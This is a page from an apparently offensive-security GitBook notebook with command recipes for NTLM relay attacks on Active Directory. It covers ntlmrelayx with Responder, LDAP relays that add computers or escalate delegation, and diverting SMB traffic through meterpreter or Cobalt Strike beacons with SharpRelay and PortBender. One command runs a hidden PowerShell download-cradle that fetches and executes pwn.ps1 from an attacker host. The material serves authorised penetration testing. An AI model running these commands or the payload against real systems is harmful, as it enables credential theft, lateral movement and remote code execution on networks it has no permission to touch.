Pentester's Promiscuous Notebook
TwitterGitHubBlog
  • README
  • ⚒️Pentest
    • C2
      • Covenant
      • Empire
      • Havoc
      • Meterpreter
      • PoshC2
      • Sliver
    • Infrastructure
      • AD
        • ACL Abuse
        • AD CS Abuse
          • dNSHostName Spoofing (Certifried)
          • ESC1
          • ESC4
          • ESC8
          • ESC15
          • Golden Certificate
          • Pass-the-Certificate
        • ADIDNS Abuse
        • Attack Trusts
        • Attack RODCs
        • AV / EDR Evasion
          • .NET Assembly
            • .NET Config Loader
            • .NET Dynamic API Invocation
            • .NET In-Memory Assembly
            • .NET Reflective Assembly
          • AMSI Bypass
          • Application Whitelist Bypass
          • AppLocker Bypass
          • BYOVD
          • CLM Bypass
          • Defender
          • ETW Block
          • Execution Policy Bypass
          • Mimikatz
          • UAC Bypass
        • Authentication Coercion
        • BadSuccessor
        • Credentials Harvesting
          • From Memory
            • lsass.exe
            • svchost.exe
          • Credential Phishing
          • DCSync
          • DPAPI
          • KeePass
          • Linux
          • LSA
          • NetSync
          • NPLogonNotify
          • NTDS
          • Password Filter
          • RDP
          • SAM
          • SSH Clients
          • SSPI
        • Discovery
        • DnsAdmins
        • Dominance
        • GPO Abuse
        • Kerberos
          • Delegation Abuse
            • Constrained
            • Resource-based Constrained
            • Unconstrained
          • Kerberos Relay
          • Roasting
        • Key Credentials Abuse
        • LAPS
        • Lateral Movement
          • DCOM
          • Overpass-the-Hash
          • Pass-the-Hash
          • Pass-the-Ticket
          • RDP
          • RPC
          • RunAs
          • SMB
          • SPN-jacking
          • WinRM / PSRemoting
          • WMI
        • LDAP
        • NTLM
          • NTLM Relay
          • NTLMv1 Downgrade
        • Password Spraying
        • Post Exploitation
        • Pre-created Computers Abuse
        • PrivExchange
        • Privileges Abuse
          • SeBackupPrivilege & SeRestorePrivilege
          • SeImpersonatePrivilege
            • Potatoes
            • PrintSpoofer
          • SeTrustedCredmanAccess
        • RID Cycling
        • SCCM Abuse
        • SMB
        • Token Manipulation
        • User Hunt
        • WSUS
        • Zerologon
      • Azure AD
        • On-Prem ↔ Cloud
          • Cloud → On-Prem
          • On-Prem → Cloud
        • PRT Abuse
      • DevOps
        • Ansible
        • Artifactory
        • Atlassian
        • Containerization / Orchestration
        • GitLab
        • HashiCorp Vault
        • Jenkins
        • VS Code
        • Zabbix
      • DBMS
        • FireBird
        • MS SQL
        • MySQL / MariaDB
        • Oracle
        • Redis
        • SQLite
      • Authentication Brute Force
      • File Transfer
      • IPMI
      • Kiosk Breakout
      • Low-Hanging Fruits
      • LPE
      • Networks
        • L2
          • ARP Spoofing
          • DHCPv6 Spoofing
          • LLMNR / NBNS Poisoning
          • SNACs Abuse
          • VLAN Hopping
        • NAC Bypass
        • Scanning
        • SIP / VoIP
        • Sniff Traffic
      • NFS
      • Persistence
      • Pivoting
      • Post Exploitation
      • SNMP
      • SSH
      • TFTP
      • VNC
    • OSINT
      • Shodan
    • Password Brute Force
      • Generate Wordlists
    • Perimeter
      • 1C
      • ADFS
      • Cisco
      • DNS
      • Exchange
      • Information Gathering
      • IPSec
      • Java RMI
      • Log4j / Log4Shell
      • Lync & Skype for Business
      • NTP
      • Outlook
      • OWA
      • SharePoint
      • SMTP
      • SSH
      • Subdomain Takeover
    • Shells
      • Reverse Shells
      • Web Shells
    • Web
      • 2FA Bypass
      • LFI / RFI
      • SOP / CORS
      • SQLi
      • WAF
      • WordPress
      • XSS
    • Wi-Fi
      • WPA / WPA2
        • Enterprise
        • Personal
  • ⚔️Red Team
    • Basics
    • Cobalt Strike
      • UDRL
    • Infrastructure
    • MalDev
      • API Hashing
      • API Hooking
      • BOF / COFF
      • CFG
      • Code Injection
        • DLL Injectors
        • Process Hollowing
        • Process Injectors
        • Shellcode Runners
      • DLL Hijacking
      • Golang
      • Kernel Mode
      • PIC / Shellcode
      • Nim
      • Sandbox Evasion
      • Syscalls
      • Windows API
    • SE
      • Phishing
        • HTML Smuggling
        • MS Office
        • Rogue RDP
  • 🐞Exploit Dev
    • BOF
      • OSCP BOF
      • OSED SEH Overflow
    • RE
    • WinDbg
  • ⚙️Admin
    • Git
    • Linux
      • Kali
    • Networking
      • DHCP Server & Linux Hotspot
      • Quick Configurations
      • Routing
      • WireGuard
    • Virtualization
      • Docker
      • Hyper-V
      • VirtualBox
      • VMWare
    • Windows
Powered by GitBook
On this page
  • CVE-2019-1040-scanner
  • Relaying on Windows
  • meterpreter + SharpRelay
  • beacon + PortBender
  1. Pentest
  2. Infrastructure
  3. AD
  4. NTLM

NTLM Relay

Last updated 2 years ago

Generate relay list with CME and enumerate local admins when relaying:

$ cme smb 192.168.2.0/24 --gen-relay-list relay.txt
$ ntlmrelayx.py -tf relay.txt -smb2support --enum-local-admins -of net-ntlmv2 --no-http-server --no-wcf-server --no-raw-server
$ smbserver.py -smb2support -port 8445 share `pwd`
$ ntlmrelayx.py -tf targets.txt -smb2support --no-http-server --no-wcf-server --no-raw-server
$ cat targets.txt
smb://10.10.13.37
smb://127.0.0.1:8445

The easier way though is to use the combination of -of/--output-file hashes.txt -ntlmchallenge 1122334455667788 options to save the hash with a predefined challenge to a file while relaying.

Relay NTLM2 responses obtained from Responder's proxy authentication to LDAP(S) (Responder's HTTP must be Off):

$ ntlmrelayx.py -t ldap(s)://DC01.megacorp.local --http-port 3128 [--add-computer] / [--delegate-access [--escalate-user 'PWNED-MACHINE$']] [-socks] --no-smb-server --no-wcf-server --no-raw-server --no-dump [--no-da --no-acl --no-validate-privs]
$ sudo ./Responder.py -I eth0 -wd -P -v

CVE-2019-1040-scanner

$ python scan.py MEGACORP/snovvcrash:'Passw0rd!'@192.168.1.11
$ python scan.py -target-file DCs.txt MEGACORP/snovvcrash:'Passw0rd!'@placeholder.xyz

Relaying on Windows

meterpreter + SharpRelay

Divert incoming SMB traffic from Victim to Attacker's local 445 port through an elevated meterpreter session and relay it to Target via MSF SOCKS server.

1. Add a static route to the Target through the 1st meterpreter session:

meterpreter > route add 192.168.1.11/32 1

2. Start MSF SOCKS server:

msf > use auxiliary/server/socks_proxy
msf auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf auxiliary(server/socks_proxy) > run -j

3. Forward a reverse port 8445 on Victim to local port 445 on Attacker and start diverting incoming SMB traffic on Victim to Victim's local 8445 port:

meterpreter > portfwd add -R -L 127.0.0.1 -l 445 -p 8445
meterpreter > cd C:\\Windows\\System32\\drivers
meterpreter > upload /home/snovvcrash/www/WinDivert64.sys
msf post(windows/manage/execute_dotnet_assembly) > set SESSION 1
msf post(windows/manage/execute_dotnet_assembly) > set DOTNET_EXE /home/snovvcrash/www/SharpRelay.exe
msf post(windows/manage/execute_dotnet_assembly) > set ARGUMENTS relaysvc "C:\Windows\System32\drivers\WinDivert64.sys" 445 8445
msf post(windows/manage/execute_dotnet_assembly) > run

4. Relay the diverted traffic to Target through SOCKS:

$ sudo proxychains4 -q ntlmrelayx.py -t smb://192.168.1.11 -smb2support

When ran once, the driver must be unloaded or the host rebooted before trying again. The fake service can be deleted with a PowerShell command:

PS > (sc.exe stop relaysvc) -and (sc.exe delete relaysvc)

beacon + PortBender

Set SOCKS server & port forwarding, upload WinDivert driver and configure redirection with PortBender:

beacon> socks 1080
beacon> rportfwd 8445 127.0.0.1 445
beacon> cd C:\Windows\System32\drivers
beacon> upload /home/snovvcrash/www/WinDivert64.sys
beacon> PortBender redirect 445 8445

Relay the planet:

$ sudo proxychains4 -q ntlmrelayx.py -t smb://192.168.1.11 -smb2support --no-http-server --no-wcf-server -c 'powershell -nop -w hidden -c "iex(new-object net.webclient).downloadstring(\"http://10.10.13.37:8080/pwn.ps1\")"'

Stop PortBender:

beacon> jobs
beacon> jobkill <JID>
beacon> kill <PID>

Relay & catch hashes (via ):

⚒️
https://en.hackndo.com/ntlm-relay/
https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/
https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/
https://www.secureauth.com/blog/playing-with-relayed-credentials/
https://www.secureauth.com/blog/we-love-relaying-credentials-a-technical-guide-to-relaying-credentials-everywhere/
https://intrinium.com/smb-relay-attack-tutorial/
https://www.sans.org/blog/smb-relay-demystified-and-ntlmv2-pwnage-with-python/
https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html
https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire
https://www.blackhillsinfosec.com/an-smb-relay-race-how-to-exploit-llmnr-and-smb-message-signing-for-fun-and-profit/
https://clement.notin.org/blog/2020/11/16/ntlm-relay-of-adws-connections-with-impacket/
https://luemmelsec.github.io/Relaying-101/
https://www.thehacker.recipes/active-directory-domain-services/movement/lm-and-ntlm/relay
https://www.trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022/
https://www.fortalicesolutions.com/posts/keeping-up-with-the-ntlm-relay
https://offsec.almond.consulting/ldap-relays-for-initial-foothold-in-dire-situations.html
https://labs.nettitude.com/blog/network-relaying-abuse-windows-domain/
https://xakep.ru/2023/04/07/ntlm-relay-guide/
https://xakep.ru/2023/04/11/ntlm-relay-guide-2/
[PDF] Coercions and Relays – The First Cred is the Deepest (Gabriel Prudhomme)
multi-relay
https://github.com/fox-it/cve-2019-1040-scanner/blob/master/scan.py
https://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445/
https://github.com/pkb1s/SharpRelay
https://github.com/praetorian-inc/PortBender
https://rastamouse.me/ntlm-relaying-via-cobalt-strike/
2MB
Lateral Movement using Credentials Relaying (taso_x).pdf
pdf